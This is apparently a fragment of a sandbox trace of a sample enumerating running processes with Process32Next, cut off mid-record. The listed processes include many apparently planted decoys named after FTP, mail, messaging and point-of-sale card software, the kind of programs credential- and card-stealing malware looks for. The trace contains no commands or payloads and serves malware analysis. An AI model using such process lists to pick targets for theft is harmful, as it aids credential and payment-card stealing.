[0238.761] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.815] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.817] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.818] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.820] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.821] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.823] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0238.824] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0238.828] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.830] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.831] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0238.833] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0238.834] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0238.836] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.838] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0238.839] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0238.844] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.846] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.848] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0238.849] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0238.851] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0238.853] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0238.855] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0238.932] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0238.934] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0238.936] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0238.938] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0238.939] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0238.941] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0238.942] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0238.944] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0238.945] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0238.947] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0238.948] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0238.950] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0238.954] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0238.956] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0238.957] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0238.958] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0238.960] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0238.961] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0238.963] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0238.964] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0238.969] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0238.970] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0238.972] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0238.974] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0238.976] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0238.978] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0238.980] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0239.034] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0239.035] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0239.037] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0239.039] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0239.040] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0239.042] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0239.047] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0239.049] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0239.050] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0239.052] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0239.054] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0239.055] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0239.057] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0239.062] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0239.063] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0239.065] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0239.067] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0239.068] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0239.070] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0239.072] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0239.073] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0239.089] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0239.091] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0239.093] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0239.094] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0239.096] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0239.097] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0239.099] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0239.101] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0239.102] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0239.104] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0239.105] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0239.109] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.111] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | 